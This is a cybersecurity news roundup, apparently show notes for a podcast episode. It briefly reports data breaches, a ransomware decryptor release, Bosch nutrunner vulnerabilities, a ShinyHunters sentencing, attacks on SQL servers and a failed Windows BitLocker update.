Texas healthcare provider suffers data breach
Texas-based care provider HMG Healthcare says that unencrypted files containing personal data belonging to residents and employees at 40 affiliated nursing facilities was accessed in August, although the organization only learned about the breach in November. HMG says it does not know exactly what data was stolen, adding that it was likely to be PII and medical records. In a filing with the Texas Attorney General submitted on Monday, HMG says approximately 75,000 Texas residents were impacted along with an unknown number of non-state residents.
Entire population of Brazil possibly exposed in data leak
Research performed by Cybernews has revealed that a publicly accessible Elasticsearch instance may have leaked data on 223 million records of Brazilian citizens, possibly representing the entire population of that country. Elasticsearch is a commonly used tool for the search, analysis, and visualization of large volumes of data, and according to Cybernews, “the leaked data was not linked to a specific company or organization, preventing Cybernews from identifying the source of the leak.” The cluster, which was located on a cloud server, contained names, dates of birth, gender, and taxpayer numbers. Cybernews confirms that this data is at least no longer publicly available.
Decryptor for Tortilla ransomware released
Cisco Talos has released a decryptor for the Tortilla variant of the Babuk ransomware and has shared it with Avast. According to The Hacker News, it was threat intelligence that Cisco Talos shared with Dutch law enforcement that facilitated the arrest the threat actor behind the operations. Avast added “a single private key is used for all victims of the Tortilla threat actor, which makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files.”
(The Hacker News and Avast)
Bosch warns of nutrunner vulnerabilities
This is not the name of a malware but instead it is a cordless, handheld pneumatic torque wrench used in automotive and other industries for safety-critical tightening operations. Researchers at Nozomi found security holes in Bosch Rexroth’s NXA015S-36V-B nutrunner, which communicates via a wireless network to send data and receive instructions. The researchers found over two dozen vulnerabilities, which could make the device inoperable, slow down assembly lines or even change tightening program configurations, specifically the torque value, resulting in loose bolts or excessively tightened bolts. A total of 25 CVE identifiers have been assigned to the nutrunner flaws, including 11 that have a ‘high severity’ rating.
Huge thanks to this week’s episode sponsor, Vanta
ShinyHunters hacker gets three years
The U.S. District Court in Seattle has sentenced French national Sebastien Raoult, age 22, to three years in prison plus restitution of $5,000,000 for being part of a phishing scam run by the ShinyHunters hacking group. Between April 2020 and July 2021, he and his team used specially crafted phishing pages that looked exactly like the login portals of their victims’ employers. This gave them access to account credentials, which they then used to log in to the systems of 60 companies, stealing data, cloud instances, and third-party service providers information. FBI agent, Richard A. Collodi, quoted in a press release posted by the United States Attorney’s Office of the Western District of Washington, described Raoult’s work as “remarkably devious.”
(Bleeping Computer and United States Attorney’s Office of the Western District of Washington)
Toronto Zoo suffers ransomware attack
The zoo posted a notification on its website on Monday, confirming that “the animals, habitat support, and care systems are safe and have not been affected by the breach,” and that the zoo remains open to guests under normal operations. Representatives noted also that the zoo does not store any credit card information. Its press release read, in part, “unfortunately, these incidents are becoming more and more common, and we are grateful we took steps over the past few years to upgrade our technology infrastructure.”
Turkish hackers target Microsoft SQL servers in Americas, Europe
Apparently unrelated to the Turkish APT group Sea Turtle that we mentioned on Monday, a group of financially motivated threat actors believed to be working out of Turkey have been seen attacking Microsoft SQL Server databases to deploy ransomware. According to a report from cybersecurity firm Securonix, “the campaign, named RE#TURGENCE, appears aimed at organizations in the US, Europe, and Latin America, with the attacks ending either in a Mimic ransomware infection or in access to the compromised environment being sold to other threat actors. The attacks include executing PowerShell scripts leading to a heavily obfuscated Cobalt Strike payload designed to be injected in a Windows process.”
Windows 10 BitLocker security update fails
Worldwide, users of Windows 10 are reporting problems installing Microsoft’s January Patch Tuesday updates. They are seeing 0x80070643 errors when trying to install the KB5034441 security update for BitLocker. This update was released as part of Microsoft’s January 2024 Patch Tuesday, to address CVE-2024-20666, a BitLocker encryption bypass that allows users to access encrypted data. Currently, Microsoft has only offered a workaround that creates a larger Windows Recovery Partition so there is enough room for the security update to install.